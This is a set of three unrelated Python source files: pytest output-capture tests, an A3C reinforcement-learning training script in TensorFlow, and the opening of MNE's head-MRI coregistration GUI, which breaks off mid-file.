result.stdout.fnmatch_lines(
"""
suspend, captured*hello1*
suspend2, captured*WARNING:root:hello3*
"""
)
result.stderr.fnmatch_lines(
"""
WARNING:root:hello2
"""
)
assert "atexit" not in result.stderr.str()
def test_error_attribute_issue555(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
assert sys.stdout.errors == "strict"
assert sys.stderr.errors == "strict"
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
@pytest.mark.skipif(
not sys.platform.startswith("win") or sys.version_info[:2] < (3, 6),
reason="only py3.6+ on windows",
)
def test_py36_windowsconsoleio_workaround_non_standard_streams():
"""
Ensure _py36_windowsconsoleio_workaround function works with objects that
do not implement the full ``io``-based stream protocol, for example execnet channels (#2666).
"""
from _pytest.capture import _py36_windowsconsoleio_workaround
class DummyStream:
def write(self, s):
pass
stream = DummyStream()
_py36_windowsconsoleio_workaround(stream)
def test_dontreadfrominput_has_encoding(testdir):
testdir.makepyfile(
"""
import sys
def test_capattr():
# should not raise AttributeError
assert sys.stdout.encoding
assert sys.stderr.encoding
"""
)
reprec = testdir.inline_run()
reprec.assertoutcome(passed=1)
def test_crash_on_closing_tmpfile_py27(testdir):
p = testdir.makepyfile(
"""
import threading
import sys
printing = threading.Event()
def spam():
f = sys.stderr
print('SPAMBEFORE', end='', file=f)
printing.set()
while True:
try:
f.flush()
except (OSError, ValueError):
break
def test_spam_in_thread():
t = threading.Thread(target=spam)
t.daemon = True
t.start()
printing.wait()
"""
)
# Do not consider plugins like hypothesis, which might output to stderr.
testdir.monkeypatch.setenv("PYTEST_DISABLE_PLUGIN_AUTOLOAD", "1")
result = testdir.runpytest_subprocess(str(p))
assert result.ret == 0
assert result.stderr.str() == ""
result.stdout.no_fnmatch_line("*IOError*")
def test_pickling_and_unpickling_encoded_file():
# See https://bitbucket.org/pytest-dev/pytest/pull-request/194
# pickle.loads() raises infinite recursion if
# EncodedFile.__getattr__ is not implemented properly
ef = capture.EncodedFile(None, None)
ef_as_str = pickle.dumps(ef)
pickle.loads(ef_as_str)
def test_global_capture_with_live_logging(testdir):
# Issue 3819
# capture should work with live cli logging
# Teardown report seems to have the capture for the whole process (setup, call, teardown)
testdir.makeconftest(
"""
def pytest_runtest_logreport(report):
if "test_global" in report.nodeid:
if report.when == "teardown":
with open("caplog", "w") as f:
f.write(report.caplog)
with open("capstdout", "w") as f:
f.write(report.capstdout)
"""
)
testdir.makepyfile(
"""
import logging
import sys
import pytest
logger = logging.getLogger(__name__)
@pytest.fixture
def fix1():
print("fix setup")
logging.info("fix setup")
yield
logging.info("fix teardown")
print("fix teardown")
def test_global(fix1):
print("begin test")
logging.info("something in test")
print("end test")
"""
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
with open("caplog", "r") as f:
caplog = f.read()
assert "fix setup" in caplog
assert "something in test" in caplog
assert "fix teardown" in caplog
with open("capstdout", "r") as f:
capstdout = f.read()
assert "fix setup" in capstdout
assert "begin test" in capstdout
assert "end test" in capstdout
assert "fix teardown" in capstdout
@pytest.mark.parametrize("capture_fixture", ["capsys", "capfd"])
def test_capture_with_live_logging(testdir, capture_fixture):
# Issue 3819
# capture should work with live cli logging
testdir.makepyfile(
"""
import logging
import sys
logger = logging.getLogger(__name__)
def test_capture({0}):
print("hello")
sys.stderr.write("world\\n")
captured = {0}.readouterr()
assert captured.out == "hello\\n"
assert captured.err == "world\\n"
logging.info("something")
print("next")
logging.info("something")
captured = {0}.readouterr()
assert captured.out == "next\\n"
""".format(
capture_fixture
)
)
result = testdir.runpytest_subprocess("--log-cli-level=INFO")
assert result.ret == 0
def test_typeerror_encodedfile_write(testdir):
"""It should behave the same with and without output capturing (#4861)."""
p = testdir.makepyfile(
"""
def test_fails():
import sys
sys.stdout.write(b"foo")
"""
)
result_without_capture = testdir.runpytest("-s", str(p))
result_with_capture = testdir.runpytest(str(p))
assert result_with_capture.ret == result_without_capture.ret
result_with_capture.stdout.fnmatch_lines(
["E * TypeError: write() argument must be str, not bytes"]
)
def test_stderr_write_returns_len(capsys):
"""Write on Encoded files, namely captured stderr, should return number of characters written."""
assert sys.stderr.write("Foo") == 3
|
train.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import tensorflow as tf
import threading
import numpy as np
import signal
import random
import os
from network import ActorCriticFFNetwork
from training_thread import A3CTrainingThread
from utils.ops import log_uniform
from utils.rmsprop_applier import RMSPropApplier
from constants import ACTION_SIZE
from constants import PARALLEL_SIZE
from constants import INITIAL_ALPHA_LOW
from constants import INITIAL_ALPHA_HIGH
from constants import INITIAL_ALPHA_LOG_RATE
from constants import MAX_TIME_STEP
from constants import CHECKPOINT_DIR
from constants import LOG_FILE
from constants import RMSP_EPSILON
from constants import RMSP_ALPHA
from constants import GRAD_NORM_CLIP
from constants import USE_GPU
from constants import TASK_TYPE
from constants import TASK_LIST
if __name__ == '__main__':
device = "/gpu:0" if USE_GPU else "/cpu:0"
network_scope = TASK_TYPE
list_of_tasks = TASK_LIST
scene_scopes = list_of_tasks.keys()
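# TASK_LIST is expected to map each scene name to a list of task (target) ids;
# one (scene, task) training branch is created per pair below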
global_t = 0
stop_requested = False
if not os.path.exists(CHECKPOINT_DIR):
os.mkdir(CHECKPOINT_DIR)
initial_learning_rate = log_uniform(INITIAL_ALPHA_LOW,
INITIAL_ALPHA_HIGH,
INITIAL_ALPHA_LOG_RATE)
global_network = ActorCriticFFNetwork(action_size = ACTION_SIZE,
device = device,
network_scope = network_scope,
scene_scopes = scene_scopes)
branches = []
for scene in scene_scopes:
for task in list_of_tasks[scene]:
branches.append((scene, task))
NUM_TASKS = len(branches)
assert PARALLEL_SIZE >= NUM_TASKS, \
"Not enough threads for multitasking: at least {} threads needed.".format(NUM_TASKS)
learning_rate_input = tf.placeholder("float")
grad_applier = RMSPropApplier(learning_rate = learning_rate_input,
decay = RMSP_ALPHA,
momentum = 0.0,
epsilon = RMSP_EPSILON,
clip_norm = GRAD_NORM_CLIP,
device = device)
# instantiate each training thread
# each thread is training for one target in one scene
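# threads are assigned to (scene, task) branches round-robin via branches[i % NUM_TASKS],
# so every branch gets at least one thread when PARALLEL_SIZE >= NUM_TASKS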
training_threads = []
for i in range(PARALLEL_SIZE):
scene, task = branches[i%NUM_TASKS]
training_thread = A3CTrainingThread(i, global_network, initial_learning_rate,
learning_rate_input,
grad_applier, MAX_TIME_STEP,
device = device,
network_scope = "thread-%d"%(i+1),
scene_scope = scene,
task_scope = task)
training_threads.append(training_thread)
# prepare session
sess = tf.Session(config=tf.ConfigProto(log_device_placement=False,
allow_soft_placement=True))
init = tf.global_variables_initializer()
sess.run(init)
# create tensorboard summaries
summary_op = dict()
summary_placeholders = dict()
for i in range(PARALLEL_SIZE):
scene, task = branches[i%NUM_TASKS]
key = scene + "-" + task
# summary for tensorboard
episode_reward_input = tf.placeholder("float")
episode_length_input = tf.placeholder("float")
episode_max_q_input = tf.placeholder("float")
scalar_summaries = [
tf.summary.scalar(key+"/Episode Reward", episode_reward_input),
tf.summary.scalar(key+"/Episode Length", episode_length_input),
tf.summary.scalar(key+"/Episode Max Q", episode_max_q_input)
]
summary_op[key] = tf.summary.merge(scalar_summaries)
summary_placeholders[key] = {
"episode_reward_input": episode_reward_input,
"episode_length_input": episode_length_input,
"episode_max_q_input": episode_max_q_input,
"learning_rate_input": learning_rate_input
}
summary_writer = tf.summary.FileWriter(LOG_FILE, sess.graph)
# init or load checkpoint with saver
# if you don't need to be able to resume training, use the next line instead.
# it will result in a much smaller checkpoint file.
# saver = tf.train.Saver(max_to_keep=10, var_list=global_network.get_vars())
saver = tf.train.Saver(max_to_keep=10)
checkpoint = tf.train.get_checkpoint_state(CHECKPOINT_DIR)
if checkpoint and checkpoint.model_checkpoint_path:
saver.restore(sess, checkpoint.model_checkpoint_path)
print("checkpoint loaded: {}".format(checkpoint.model_checkpoint_path))
tokens = checkpoint.model_checkpoint_path.split("-")
# set global step
global_t = int(tokens[1])
print(">>> global step set: {}".format(global_t))
else:
print("Could not find old checkpoint")
def train_function(parallel_index):
global global_t
training_thread = training_threads[parallel_index]
last_global_t = 0
scene, task = branches[parallel_index % NUM_TASKS]
key = scene + "-" + task
while global_t < MAX_TIME_STEP and not stop_requested:
diff_global_t = training_thread.process(sess, global_t, summary_writer,
summary_op[key], summary_placeholders[key])
global_t += diff_global_t
# periodically save checkpoints to disk
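# only the first thread (parallel_index == 0) writes checkpoints,
# roughly once every 1,000,000 global steps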
if parallel_index == 0 and global_t - last_global_t > 1000000:
print('Save checkpoint at step %d' % global_t)
saver.save(sess, CHECKPOINT_DIR + '/' + 'checkpoint', global_step = global_t)
last_global_t = global_t
def signal_handler(signal, frame):
global stop_requested
print('You pressed Ctrl+C!')
stop_requested = True
train_threads = []
for i in range(PARALLEL_SIZE):
train_threads.append(threading.Thread(target=train_function, args=(i,)))
signal.signal(signal.SIGINT, signal_handler)
# start each training thread
for t in train_threads:
t.start()
print('Press Ctrl+C to stop.')
signal.pause()
# wait for all threads to finish
for t in train_threads:
t.join()
print('Now saving data. Please wait.')
saver.save(sess, CHECKPOINT_DIR + '/' + 'checkpoint', global_step = global_t)
summary_writer.close()
|
_coreg_gui.py
|
"""Traits-based GUI for head-MRI coregistration"""
# Authors: Christian Brodbeck <christianbrodbeck@nyu.edu>
#
# License: BSD (3-clause)
import os
from ..externals.six.moves import queue
import re
from threading import Thread
import warnings
import numpy as np
from scipy.spatial.distance import cdist
# allow import without traits
try:
from mayavi.core.ui.mayavi_scene import MayaviScene
from mayavi.tools.mlab_scene_model import MlabSceneModel
from pyface.api import (error, confirm, warning, OK, YES, information,
FileDialog, GUI)
from traits.api import (Bool, Button, cached_property, DelegatesTo,
Directory, Enum, Float, HasTraits,
HasPrivateTraits, Instance, Int, on_trait_change,
Property, Str)
from traitsui.api import (View, Item, Group, HGroup, VGroup, VGrid,
EnumEditor, Handler, Label, TextEditor)
from traitsui.menu import Action, UndoButton, CancelButton, NoButtons
from tvtk.pyface.scene_editor import SceneEditor
except Exception:
from ..utils import trait_wraith
HasTraits = HasPrivateTraits = Handler = object
cached_property = on_trait_change = MayaviScene = MlabSceneModel =\
Bool = Button = DelegatesTo = Directory = Enum = Float = Instance =\
Int = Property = Str = View = Item = Group = HGroup = VGroup = VGrid =\
EnumEditor = Label = TextEditor = Action = UndoButton = CancelButton =\
NoButtons = SceneEditor = trait_wraith
from ..coreg import bem_fname, trans_fname
from ..io.constants import FIFF
from ..forward import prepare_bem_model
from ..transforms import (write_trans, read_trans, apply_trans, rotation,
translation, scaling, rotation_angles)
from ..coreg import (fit_matched_points, fit_point_cloud, scale_mri,
_point_cloud_error)
from ..utils import get_subjects_dir, logger
from ._fiducials_gui import MRIHeadWithFiducialsModel, FiducialsPanel
from ._file_traits import (set_mne_root, trans_wildcard, RawSource,
SubjectSelectorPanel)
from ._viewer import (defaults, HeadViewController, PointObject, SurfaceObject,
_testing_mode)
laggy_float_editor = TextEditor(auto_set=False, enter_set=True, evaluate=float)
class CoregModel(HasPrivateTraits):
"""Traits object for estimating the head mri transform.
Notes
-----
Transform from head to mri space is modelled with the following steps:
* move the head shape to its nasion position
* rotate the head shape with user defined rotation around its nasion
* move the head shape by user defined translation
* move the head shape origin to the mri nasion
If MRI scaling is enabled,
* the MRI is scaled relative to its origin center (prior to any
transformation of the digitizer head)
Don't sync transforms to anything to prevent them from being recomputed
upon every parameter change.
"""
# data sources
mri = Instance(MRIHeadWithFiducialsModel, ())
hsp = Instance(RawSource, ())
# parameters
grow_hair = Float(label="Grow Hair [mm]", desc="Move the back of the MRI "
"head outwards to compensate for hair on the digitizer "
"head shape")
n_scale_params = Enum(0, 1, 3, desc="Scale the MRI to better fit the "
"subject's head shape (a new MRI subject will be "
"created with a name specified upon saving)")
scale_x = Float(1, label="Right (X)")
scale_y = Float(1, label="Anterior (Y)")
scale_z = Float(1, label="Superior (Z)")
rot_x = Float(0, label="Right (X)")
rot_y = Float(0, label="Anterior (Y)")
rot_z = Float(0, label="Superior (Z)")
trans_x = Float(0, label="Right (X)")
trans_y = Float(0, label="Anterior (Y)")
trans_z = Float(0, label="Superior (Z)")
prepare_bem_model = Bool(True, desc="whether to run mne_prepare_bem_model "
"after scaling the MRI")
# secondary to parameters
scale = Property(depends_on=['n_scale_params', 'scale_x', 'scale_y',
'scale_z'])
has_fid_data = Property(Bool, depends_on=['mri_origin', 'hsp.nasion'],
desc="Required fiducials data is present.")
has_pts_data = Property(Bool, depends_on=['mri.points', 'hsp.points'])
# MRI dependent
mri_origin = Property(depends_on=['mri.nasion', 'scale'],
desc="Coordinates of the scaled MRI's nasion.")
# target transforms
mri_scale_trans = Property(depends_on=['scale'])
head_mri_trans = Property(depends_on=['hsp.nasion', 'rot_x', 'rot_y',
'rot_z', 'trans_x', 'trans_y',
'trans_z', 'mri_origin'],
desc="Transformaiton of the head shape to "
"match the scaled MRI.")
# info
subject_has_bem = DelegatesTo('mri')
lock_fiducials = DelegatesTo('mri')
can_prepare_bem_model = Property(Bool, depends_on=['n_scale_params',
'subject_has_bem'])
can_save = Property(Bool, depends_on=['head_mri_trans'])
raw_subject = Property(depends_on='hsp.raw_fname', desc="Subject guess "
"based on the raw file name.")
# transformed geometry
processed_mri_points = Property(depends_on=['mri.points', 'grow_hair'])
transformed_mri_points = Property(depends_on=['processed_mri_points',
'mri_scale_trans'])
transformed_hsp_points = Property(depends_on=['hsp.points',
'head_mri_trans'])
transformed_mri_lpa = Property(depends_on=['mri.lpa', 'mri_scale_trans'])
transformed_hsp_lpa = Property(depends_on=['hsp.lpa', 'head_mri_trans'])
transformed_mri_nasion = Property(depends_on=['mri.nasion',
'mri_scale_trans'])
transformed_hsp_nasion = Property(depends_on=['hsp.nasion',
'head_mri_trans'])
transformed_mri_rpa = Property(depends_on=['mri.rpa', 'mri_scale_trans'])
transformed_hsp_rpa = Property(depends_on=['hsp.rpa', 'head_mri_trans'])
# fit properties
lpa_distance = Property(depends_on=['transformed_mri_lpa',
'transformed_hsp_lpa'])
nasion_distance = Property(depends_on=['transformed_mri_nasion',
'transformed_hsp_nasion'])
rpa_distance = Property(depends_on=['transformed_mri_rpa',
'transformed_hsp_rpa'])
point_distance = Property(depends_on=['transformed_mri_points',
'transformed_hsp_points'])
# fit property info strings
fid_eval_str = Property(depends_on=['lpa_distance', 'nasion_distance',
'rpa_distance'])
points_eval_str = Property(depends_on='point_distance')
@cached_property
def _get_can_prepare_bem_model(self):
return self.subject_has_bem and self.n_scale_params > 0
@cached_property
def _get_can_save(self):
return np.any(self.head_mri_trans != np.eye(4))
@cached_property
def _get_has_pts_data(self):
has = (np.any(self.mri.points) and np.any(self.hsp.points))
return has
@cached_property
def _get_has_fid_data(self):
has = (np.any(self.mri_origin) and np.any(self.hsp.nasion))
return has
@cached_property
def _get_scale(self):
if self.n_scale_params == 0:
return np.array(1)
elif self.n_scale_params == 1:
return np.array(self.scale_x)
else:
return np.array([self.scale_x, self.scale_y, self.scale_z])
@cached_property
def _get_mri_scale_trans(self):
if np.isscalar(self.scale) or self.scale.ndim == 0:
if self.scale == 1:
return np.eye(4)
else:
s = self.scale
return scaling(s, s, s)
else:
return scaling(*self.scale)
@cached_property
def _get_mri_origin(self):
if np.isscalar(self.scale) and self.scale == 1:
return self.mri.nasion
else:
return self.mri.nasion * self.scale
@cached_property
def _get_head_mri_trans(self):
if not self.has_fid_data:
return np.eye(4)
# move hsp so that its nasion becomes the origin
x, y, z = -self.hsp.nasion[0]
trans = translation(x, y, z)
# rotate hsp by rotation parameters
rot = rotation(self.rot_x, self.rot_y, self.rot_z)
trans = np.dot(rot, trans)
# move hsp by translation parameters
transl = translation(self.trans_x, self.trans_y, self.trans_z)
trans = np.dot(transl, trans)
# move the hsp origin(/nasion) to the MRI's nasion
x, y, z = self.mri_origin[0]
tgt_mri_trans = translation(x, y, z)
trans = np.dot(tgt_mri_trans, trans)
return trans
@cached_property
def _get_processed_mri_points(self):
if self.grow_hair:
if len(self.mri.norms):
if self.n_scale_params == 0:
scaled_hair_dist = self.grow_hair / 1000
else:
scaled_hair_dist = self.grow_hair / self.scale / 1000
points = self.mri.points.copy()
hair = points[:, 2] > points[:, 1]
points[hair] += self.mri.norms[hair] * scaled_hair_dist
return points
else:
error(None, "Norms missing form bem, can't grow hair")
self.grow_hair = 0
return self.mri.points
@cached_property
def _get_transformed_mri_points(self):
points = apply_trans(self.mri_scale_trans, self.processed_mri_points)
return points
@cached_property
def _get_transformed_mri_lpa(self):
return apply_trans(self.mri_scale_trans, self.mri.lpa)
@cached_property
def _get_transformed_mri_nasion(self):
return apply_trans(self.mri_scale_trans, self.mri.nasion)
@cached_property
def _get_transformed_mri_rpa(self):
return apply_trans(self.mri_scale_trans, self.mri.rpa)
@cached_property
def _get_transformed_hsp_points(self):
return apply_trans(self.head_mri_trans, self.hsp.points)
@cached_property
def _get_transformed_hsp_lpa(self):
return apply_trans(self.head_mri_trans, self.hsp.lpa)
@cached_property
def _get_transformed_hsp_nasion(self):
return apply_trans(self.head_mri_trans, self.hsp.nasion)
@cached_property
def _get_transformed_hsp_rpa(self):
return apply_trans(self.head_mri_trans, self.hsp.rpa)
@cached_property
def _get_lpa_distance(self):
d = np.ravel(self.transformed_mri_lpa - self.transformed_hsp_lpa)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_nasion_distance(self):
d = np.ravel(self.transformed_mri_nasion - self.transformed_hsp_nasion)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_rpa_distance(self):
d = np.ravel(self.transformed_mri_rpa - self.transformed_hsp_rpa)
return np.sqrt(np.dot(d, d))
@cached_property
def _get_point_distance(self):
if (len(self.transformed_hsp_points) == 0 or
len(self.transformed_mri_points) == 0):
return
dists = cdist(self.transformed_hsp_points, self.transformed_mri_points,
'euclidean')
dists = np.min(dists, 1)
return dists
@cached_property
def _get_fid_eval_str(self):
d = (self.lpa_distance * 1000, self.nasion_distance * 1000,
self.rpa_distance * 1000)
txt = ("Fiducials Error: LPA %.1f mm, NAS %.1f mm, RPA %.1f mm" % d)
return txt
@cached_property
def _get_points_eval_str(self):
if self.point_distance is None:
return ""
av_dist = np.mean(self.point_distance)
return "Average Points Error: %.1f mm" % (av_dist * 1000)
def _get_raw_subject(self):
# subject name guessed based on the raw file name
if '_' in self.hsp.raw_fname:
subject, _ = self.hsp.raw_fname.split('_', 1)
if not subject:
subject = None
else:
subject = None
return subject
@on_trait_change('raw_subject')
def _on_raw_subject_change(self, subject):
if subject in self.mri.subject_source.subjects:
self.mri.subject = subject
elif 'fsaverage' in self.mri.subject_source.subjects:
self.mri.subject = 'fsaverage'
def omit_hsp_points(self, distance=0, reset=False):
"""Exclude head shape points that are far away from the MRI head
Parameters
----------
distance : float
Exclude all points that are further away from the MRI head than
this distance. Previously excluded points are still excluded unless
reset=True is specified. A value of distance <= 0 excludes nothing.
reset : bool
Reset the filter before calculating new omission (default is
False).
"""
distance = float(distance)
if reset:
logger.info("Coregistration: Reset excluded head shape points")
with warnings.catch_warnings(record=True): # Traits None comp
self.hsp.points_filter = None
if distance <= 0:
return
# find the new filter
hsp_pts = self.transformed_hsp_points
mri_pts = self.transformed_mri_points
point_distance = _point_cloud_error(hsp_pts, mri_pts)
new_sub_filter = point_distance <= distance
n_excluded = np.sum(new_sub_filter == False) # noqa
logger.info("Coregistration: Excluding %i head shape points with "
"distance >= %.3f m.", n_excluded, distance)
# combine the new filter with the previous filter
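# new_sub_filter is indexed against the currently *included* points, so map it
# back onto a mask over all raw points using the previous filter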
old_filter = self.hsp.points_filter
if old_filter is None:
new_filter = new_sub_filter
else:
new_filter = np.ones(len(self.hsp.raw_points), np.bool8)
new_filter[old_filter] = new_sub_filter
# set the filter
with warnings.catch_warnings(record=True): # comp to None in Traits
self.hsp.points_filter = new_filter
def fit_auricular_points(self):
"Find rotation to fit LPA and RPA"
src_fid = np.vstack((self.hsp.lpa, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid *= self.scale
tgt_fid -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z)
rot = fit_matched_points(src_fid, tgt_fid, rotate=True,
translate=False, x0=x0, out='params')
self.rot_x, self.rot_y, self.rot_z = rot
def fit_fiducials(self):
"Find rotation and translation to fit all 3 fiducials"
src_fid = np.vstack((self.hsp.lpa, self.hsp.nasion, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.nasion, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid *= self.scale
x0 = (self.rot_x, self.rot_y, self.rot_z, self.trans_x, self.trans_y,
self.trans_z)
est = fit_matched_points(src_fid, tgt_fid, x0=x0, out='params')
self.rot_x, self.rot_y, self.rot_z = est[:3]
self.trans_x, self.trans_y, self.trans_z = est[3:]
def fit_hsp_points(self):
"Find rotation to fit head shapes"
src_pts = self.hsp.points - self.hsp.nasion
tgt_pts = self.processed_mri_points - self.mri.nasion
tgt_pts *= self.scale
tgt_pts -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z)
rot = fit_point_cloud(src_pts, tgt_pts, rotate=True, translate=False,
x0=x0)
self.rot_x, self.rot_y, self.rot_z = rot
def fit_scale_auricular_points(self):
"Find rotation and MRI scaling based on LPA and RPA"
src_fid = np.vstack((self.hsp.lpa, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.rpa))
tgt_fid -= self.mri.nasion
tgt_fid -= [self.trans_x, self.trans_y, self.trans_z]
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x)
x = fit_matched_points(src_fid, tgt_fid, rotate=True, translate=False,
scale=1, x0=x0, out='params')
self.scale_x = 1. / x[3]
self.rot_x, self.rot_y, self.rot_z = x[:3]
def fit_scale_fiducials(self):
"Find translation, rotation and scaling based on the three fiducials"
src_fid = np.vstack((self.hsp.lpa, self.hsp.nasion, self.hsp.rpa))
src_fid -= self.hsp.nasion
tgt_fid = np.vstack((self.mri.lpa, self.mri.nasion, self.mri.rpa))
tgt_fid -= self.mri.nasion
x0 = (self.rot_x, self.rot_y, self.rot_z, self.trans_x, self.trans_y,
self.trans_z, 1. / self.scale_x,)
est = fit_matched_points(src_fid, tgt_fid, rotate=True, translate=True,
scale=1, x0=x0, out='params')
self.scale_x = 1. / est[6]
self.rot_x, self.rot_y, self.rot_z = est[:3]
self.trans_x, self.trans_y, self.trans_z = est[3:6]
def fit_scale_hsp_points(self):
"Find MRI scaling and rotation to match head shape points"
src_pts = self.hsp.points - self.hsp.nasion
tgt_pts = self.processed_mri_points - self.mri.nasion
if self.n_scale_params == 1:
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x)
est = fit_point_cloud(src_pts, tgt_pts, rotate=True,
translate=False, scale=1, x0=x0)
self.scale_x = 1. / est[3]
else:
x0 = (self.rot_x, self.rot_y, self.rot_z, 1. / self.scale_x,
1. / self.scale_y, 1. / self.scale_z)
est = fit_point_cloud(src_pts, tgt_pts, rotate=True,
translate=False, scale=3, x0=x0)
self.scale_x, self.scale_y, self.scale_z = 1. / est[3:]
self.rot_x, self.rot_y, self.rot_z = est[:3]
def get_scaling_job(self, subject_to):
desc = 'Scaling %s' % subject_to
func = scale_mri
args = (self.mri.subject, subject_to, self.scale)
kwargs = dict(overwrite=True, subjects_dir=self.mri.subjects_dir)
return (desc, func, args, kwargs)
def get_prepare_bem_model_job(self, subject_to):
subjects_dir = self.mri.subjects_dir
subject_from = self.mri.subject
bem_name = 'inner_skull-bem'
bem_file = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_from, name=bem_name)
if not os.path.exists(bem_file):
pattern = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to, name='(.+-bem)')
bem_dir, bem_file = os.path.split(pattern)
m = None
bem_file_pattern = re.compile(bem_file)
for name in os.listdir(bem_dir):
m = bem_file_pattern.match(name)
if m is not None:
break
if m is None:
pattern = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to, name='*-bem')
err = ("No bem file found; looking for files matching "
"%s" % pattern)
error(None, err)
return
bem_name = m.group(1)
bem_file = bem_fname.format(subjects_dir=subjects_dir,
subject=subject_to, name=bem_name)
# job
desc = 'mne_prepare_bem_model for %s' % subject_to
func = prepare_bem_model
args = (bem_file,)
kwargs = {}
return (desc, func, args, kwargs)
def load_trans(self, fname):
"""Load the head-mri transform from a fif file
Parameters
----------
fname : str
File path.
"""
info = read_trans(fname)
head_mri_trans = info['trans']
self.set_trans(head_mri_trans)
def reset(self):
"""Reset all the parameters affecting the coregistration"""
self.reset_traits(('grow_hair', 'n_scale_params', 'scale_x',
'scale_y', 'scale_z', 'rot_x', 'rot_y', 'rot_z',
'trans_x', 'trans_y', 'trans_z'))
def set_trans(self, head_mri_trans):
"""Set rotation and translation parameters from a transformation matrix
Parameters
----------
head_mri_trans : array, shape (4, 4)
Transformation matrix from head to MRI space.
"""
x, y, z = -self.mri_origin[0]
mri_tgt_trans = translation(x, y, z)
head_tgt_trans = np.dot(mri_tgt_trans, head_mri_trans)
x, y, z = self.hsp.nasion[0]
src_hsp_trans = translation(x, y, z)
src_tgt_trans = np.dot(head_tgt_trans, src_hsp_trans)
rot_x, rot_y, rot_z = rotation_angles(src_tgt_trans[:3, :3])
x, y, z = src_tgt_trans[:3, 3]
self.rot_x = rot_x
self.rot_y = rot_y
self.rot_z = rot_z
self.trans_x = x
self.trans_y = y
self.trans_z = z
def save_trans(self, fname):
"""Save the head-mri transform as a fif file
Parameters
----------
fname : str
Target file path.
"""
if not self.can_save:
raise RuntimeError("Not enough information for saving transform")
trans_matrix = self.head_mri_trans
trans = {'to': FIFF.FIFFV_COORD_MRI, 'from': FIFF.FIFFV_COORD_HEAD,
'trans': trans_matrix}
write_trans(fname, trans)
class CoregFrameHandler(Handler):
"""Handler that checks for unfinished processes before closing its window
"""
def close(self, info, is_ok):
if info.object.queue.unfinished_tasks:
information(None, "Can not close the window while saving is still "
"in progress. Please wait until all MRIs are "
"processed.", "Saving Still in Progress")
return False
else:
return True
class CoregPanel(HasPrivateTraits):
model = Instance(CoregModel)
# parameters
reset_params = Button(label='Reset')
grow_hair = DelegatesTo('model')
n_scale_params = DelegatesTo('model')
scale_step = Float(1.01)
scale_x = DelegatesTo('model')
scale_x_dec = Button('-')
scale_x_inc = Button('+')
scale_y = DelegatesTo('model')
scale_y_dec = Button('-')
scale_y_inc = Button('+')
scale_z = DelegatesTo('model')
scale_z_dec = Button('-')
scale_z_inc = Button('+')
rot_step = Float(0.01)
rot_x = DelegatesTo('model')
rot_x_dec = Button('-')
rot_x_inc = Button('+')
rot_y = DelegatesTo('model')
rot_y_dec = Button('-')
rot_y_inc = Button('+')
rot_z = DelegatesTo('model')
rot_z_dec = Button('-')
rot_z_inc = Button('+')
trans_step = Float(0.001)
trans_x = DelegatesTo('model')
trans_x_dec = Button('-')
trans_x_inc = Button('+')
trans_y = DelegatesTo('model')
trans_y_dec = Button('-')
trans_y_inc = Button('+')
trans_z = DelegatesTo('model')
trans_z_dec = Button('-')
trans_z_inc = Button('+')
# fitting
has_fid_data = DelegatesTo('model')
has_pts_data = DelegatesTo('model')
# fitting with scaling
fits_hsp_points = Button(label='Fit Head Shape')
fits_fid = Button(label='Fit Fiducials')
fits_ap = Button(label='Fit LPA/RPA')
# fitting without scaling
fit_hsp_points = Button(label='Fit Head Shape')
fit_fid = Button(label='Fit Fiducials')
fit_ap = Button(label='Fit LPA/RPA')
# fit info
fid_eval_str = DelegatesTo('model')
points_eval_str = DelegatesTo('model')
# saving
can_prepare_bem_model = DelegatesTo('model')
can_save = DelegatesTo('model')
prepare_bem_model = DelegatesTo('model')
save = Button(label="Save As...")
load_trans = Button
queue = Instance(queue.Queue, ())
queue_feedback = Str('')
queue_current = Str('')
queue_len = Int(0)
queue_len_str = Property(Str, depends_on=['queue_len'])
error = Str('')
view = View(VGroup(Item('grow_hair', show_label=True),
Item('n_scale_params', label='MRI Scaling',
style='custom', show_label=True,
editor=EnumEditor(values={0: '1:No Scaling',
1: '2:1 Param',
3: '3:3 Params'},
cols=3)),
VGrid(Item('scale_x', editor=laggy_float_editor,
show_label=True, tooltip="Scale along "
"right-left axis",
enabled_when='n_scale_params > 0'),
Item('scale_x_dec',
enabled_when='n_scale_params > 0'),
Item('scale_x_inc',
enabled_when='n_scale_params > 0'),
Item('scale_step', tooltip="Scaling step",
enabled_when='n_scale_params > 0'),
Item('scale_y', editor=laggy_float_editor,
show_label=True,
enabled_when='n_scale_params > 1',
tooltip="Scale along anterior-posterior "
"axis"),
Item('scale_y_dec',
enabled_when='n_scale_params > 1'),
Item('scale_y_inc',
enabled_when='n_scale_params > 1'),
Label('(Step)'),
Item('scale_z', editor=laggy_float_editor,
show_label=True,
enabled_when='n_scale_params > 1',
tooltip="Scale along anterior-posterior "
"axis"),
Item('scale_z_dec',
enabled_when='n_scale_params > 1'),
Item('scale_z_inc',
enabled_when='n_scale_params > 1'),
show_labels=False, columns=4),
HGroup(Item('fits_hsp_points',
enabled_when='n_scale_params',
tooltip="Rotate the digitizer head shape "
"and scale the MRI so as to minimize the "
"distance from each digitizer point to the "
"closest MRI point"),
Item('fits_ap',
enabled_when='n_scale_params == 1',
tooltip="While leaving the nasion in "
"place, rotate the digitizer head shape "
"and scale the MRI so as to minimize the "
"distance of the two auricular points"),
Item('fits_fid',
enabled_when='n_scale_params == 1',
tooltip="Move and rotate the digitizer "
"head shape, and scale the MRI so as to "
"minimize the distance of the three "
"fiducials."),
show_labels=False),
'_',
Label("Translation:"),
